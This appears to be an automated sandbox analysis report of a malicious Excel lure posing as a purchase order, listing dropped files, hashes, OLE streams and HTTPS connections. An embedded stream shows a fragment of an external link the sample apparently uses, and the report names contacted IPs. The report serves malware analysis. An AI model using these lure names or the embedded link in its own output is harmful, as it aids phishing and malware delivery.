258a5a1e95b8a911872bae9081526644 | CMR ReF 15200477813.docx.doc | malicious | Unknown | 13.107.246.40
258a5a1e95b8a911872bae9081526644 | PRE#U00c7O - RFQ 674441-76450.xla.xlsx | malicious | Unknown | 13.107.246.40
                                    No context
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):118
                                    Entropy (8bit):3.5700810731231707
                                    Encrypted:false
                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                    MD5:573220372DA4ED487441611079B623CD
                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):8.112143835430977E-5
                                    Encrypted:false
                                    SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                                    MD5:AFDEAC461EEC32D754D8E6017E845D21
                                    SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                                    SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                                    SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):71
                                    Entropy (8bit):4.3462513114457515
                                    Encrypted:false
                                    SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                                    MD5:8F4510F128F81A8BAF2A345D00F7E30C
                                    SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                                    SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                                    SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:ASCII text, with very long lines (28677), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.21642373320021804
                                    Encrypted:false
                                    SSDEEP:1536:/RxNgYuqWKjSPXs7NqTf10YhElCCyjj4wT8W2Fs7v2i1/2vmcnyzJtoO+PTgEjXk:f+XLd0YnCyDR0W288B9ZBr7
                                    MD5:FF4F8E88E02001D667DB23A6E7EEA175
                                    SHA1:F94E4AF746849E075F9AD23F36080B14169C04B3
                                    SHA-256:76319F389920E2A78041ED938CAB9390E21C3B4A6056362ABE7147AC07F9B459
                                    SHA-512:D0CE7FC9F89BB7BA4E0DAD97B47DF859CABEC3F30DBF850349D9E84DB7CBC12CDC0662CE6C375BE05CC07621DE39369B2214E65487091F920E951B0D5105D081
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/25/2025 16:50:17.372.EXCEL (0x1FC0).0x1D10.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-25T16:50:17.372Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:50:16.5602376Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:50:16.5602376Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:50:16.5602376Z\", \"C\" : \"\", \"Q\" : 15.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                    Malicious:false
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:ASCII text, with very long lines (28799), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):261360
                                    Entropy (8bit):5.150946418525623
                                    Encrypted:false
                                    SSDEEP:1536:+yjmk2lqze636Nouywz+7qZkIt0jbmTKdYtHMd347btcZkb3N9FDDBukbcxdgsM5:NSkr6NOwz4gp99ZBr7LvJ
                                    MD5:C9366DF5AC8EB603F9336596ECD03F34
                                    SHA1:CD1D64283F94C067813C86910348BED2D88EB2FF
                                    SHA-256:AC8416C2DEACE647FED00ADA1E2CFB032DC20BFF5A0CDA1830CBA02D55FE7BE2
                                    SHA-512:EB9276268D882A7D9344231A5D9BAFE367A9D17651F433BA31BF704713BBED1A8DD2D1C31B656E930AD68E8FD14DA7464DD9151D30A2389421B4D5B07B1F3B2C
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/25/2025 16:51:32.494.EXCEL (0x19DC).0x1C98.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-25T16:51:32.494Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:51:32.2600636Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:51:32.2600636Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:51:32.2600636Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.4377382811115937
                                    Encrypted:false
                                    SSDEEP:3:ZaFuMulv:ZaFutv
                                    MD5:FBC4AD8A314E46493E8D3E9CABCCC98F
                                    SHA1:2B63B4CE7BDDE94EE0340E9F889E9DD51F7CF5F1
                                    SHA-256:7A3B16347DDDFCB28958C144FD51FFFC60301893AA3327708F698771F628FBD7
                                    SHA-512:7D570241B7B9DD20B443BF3CE2CFB1989A603DAB40ED33ED440D6AB5486E68898A622041280D60F41CF450B1E07F465F7DE1C416493EECE5E31AA2577A3C91B3
                                    Malicious:true
                                    Preview:.user ..H.a.n.z.o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Mar 25 10:25:39 2025, Security: 1
                                    Entropy (8bit):7.982615142561084
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 47.99%
                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                    File name:PURCHASE ORDER 5172025.xla.xlsx
                                    File size:1'268'224 bytes
                                    MD5:e79caec024d0abddc288e30c2c974945
                                    SHA1:2e56b64b76874ae950f7d71b115fff184e0b33f3
                                    SHA256:fb12a393e8260ef0e83bb670f86e19ce598b14bb9bbb8f90d27b573a310180f5
                                    SHA512:b4870c6be966a5c016f5a16d911bfb792c43a6f1c78b8cfe34bf989e01479ed4b845dfd9d356303985063988d8f18524cfe65abe08d68ffd851fdbb927bb2267
                                    SSDEEP:24576:YN/dT0Hr47PD4UTqRgJ+pn0M9cWNVDfrsnlf:YNFTs4DD4hg00MtDDTM1
                                    TLSH:694523A87BC1CFA6C5FB55FD48A6A9154006FCC0A26B97477241B7CE7530378838B68B
                                    Icon Hash:35e58a8c0c8a85b9
                                    Document Type:OLE
                                    Number of OLE Files:1
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:True
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:True
                                    Code Page:1252
                                    Author:
                                    Last Saved By:
                                    Create Time:2006-09-16 00:00:00
                                    Last Saved Time:2025-03-25 10:25:39
                                    Creating Application:Microsoft Excel
                                    Security:1
                                    Document Code Page:1252
                                    Thumbnail Scaling Desired:False
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:786432
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                    VBA File Name:Sheet1.cls
                                    Stream Size:977
                                    Attribute VB_Name = "Sheet1"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                    VBA File Name:Sheet2.cls
                                    Stream Size:977
                                    Attribute VB_Name = "Sheet2"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                    VBA File Name:Sheet3.cls
                                    Stream Size:977
                                    Attribute VB_Name = "Sheet3"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                    VBA File Name:ThisWorkbook.cls
                                    Stream Size:985
                                    Attribute VB_Name = "ThisWorkbook"
                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:244
                                    Entropy:2.889430592781307
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    General
                                    Stream Path:\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:200
                                    Entropy:3.2603503175049817
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . S . A p . . . . . . . . .
                                    General
                                    Stream Path:MBD00A6776E/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:99
                                    Entropy:3.631242196770981
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                    General
                                    Stream Path:MBD00A6776E/Package
                                    CLSID:
                                    File Type:Microsoft Excel 2007+
                                    Stream Size:1099154
                                    Entropy:7.995034746087403
                                    Base64 Encoded:True
                                    Data ASCII:P K . . . . . . . . . . ! . w 1 . . . . j . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    General
                                    Stream Path:MBD00A6776F/\x1Ole
                                    CLSID:
                                    File Type:data
                                    Stream Size:494
                                    Entropy:5.845279778686223
                                    Base64 Encoded:False
                                    Data ASCII:. . . . H . . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . t . . . e . m . o . b . i . l . i . t . y . . . e . n . e . r . g . y . / . k . q . Q . 8 . b . I . . . i 2 h A $ . 9 v . M . | " | . ^ } . . . 2 . . p 4 1 = M [ z T E ^ ~ I i . - = . A X ' ` . . r G | p . B ' $ G * z F v . \\ x w Y Y n B Z X " ] \\ H . l $ W J d , W | J . S A / g } . ] . . . . . . . . . . . . . . . . . . . Z . D . L . b . T . 8 . c . a . d . B . E . l . R . x . 8 . V . v . N . 0 . Y . M . s . R .
                                    General
                                    Stream Path:Workbook
                                    CLSID:
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:144844
                                    Entropy:7.99545252584344
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ; / @ ] ; ] X . . . 2 z u : Z 6 . : . ~ . : @ D o . * E . ~ } . . . . . . . . . . . U . . . \\ . p . . W g b O . l N f y I . : ~ . . . U 6 . p ; Z z " N 3 j ] > . ` , . 4 . 0 . # ^ . F v ! . g e b e V q . T o . . C h G B . . . a . . . " . . . = . . . . x . . . n Y : . . ; o . j . . . . . . . . . . . y a . . . . w . . . . . . . = . . . X ^ . . ? O 5 . i G @ . . . . . . . } " . . . L r . . . . . . . r . . . A 1 . . . w R ? ( Y " G j k r . . > . e . 1 .
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                    CLSID:
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:531
                                    Entropy:5.22065657326829
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 1 2 F 7 0 6 2 C - 6 A 4 9 - 4 1 0 5 - B F D 6 - F 4 8 3 3 1 8 3 3 3 5 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 7 C 5 6 C A 4 9 4 A C 6 C B 0 6
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                    CLSID:
                                    File Type:data
                                    Stream Size:104
                                    Entropy:3.0488640812019017
                                    Base64 Encoded:False
                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                    CLSID:
                                    File Type:data
                                    Stream Size:2644
                                    Entropy:3.989996811732665
                                    Base64 Encoded:False
                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                    CLSID:
                                    File Type:data
                                    Stream Size:553
                                    Entropy:6.357006260243376
                                    Base64 Encoded:True
                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . S . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2


                                    • Total Packets: 46
                                    • 443 (HTTPS)
                                    • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2025 17:51:09.285326958 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.285372019 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.285501003 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.286550999 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.286569118 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.680623055 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.680818081 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.686080933 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.686088085 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.687295914 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.687374115 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.688914061 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.689302921 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.689507961 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.689516068 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:09.689694881 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.690588951 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:09.732275009 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.077702999 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.077790022 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.077903986 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.084120035 CET | 49723 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.084135056 CET | 443 | 49723 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.086297989 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.086319923 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.086477041 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.087414980 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.087425947 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.462282896 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.462791920 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.463980913 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.463985920 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.464361906 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.464431047 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.466022015 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.466090918 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.466140032 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.466140032 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.512280941 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.843539000 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.843574047 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.843647003 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.843717098 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.843717098 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.854444027 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.854444027 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:10.854465008 CET | 443 | 49724 | 162.19.137.157 | 192.168.2.27
Mar 25, 2025 17:51:10.854578018 CET | 49724 | 443 | 192.168.2.27 | 162.19.137.157
Mar 25, 2025 17:51:24.760730028 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:24.760795116 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:24.760869026 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:24.760935068 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:24.760983944 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:24.761128902 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:24.761284113 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:24.761300087 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:24.761528015 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:24.761550903 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.069134951 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.069225073 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.070225000 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.070297956 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.073126078 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.073137999 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.073260069 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.073271036 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.073441029 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.073549032 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.084428072 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.084455967 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.128262997 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.128278971 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.261396885 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
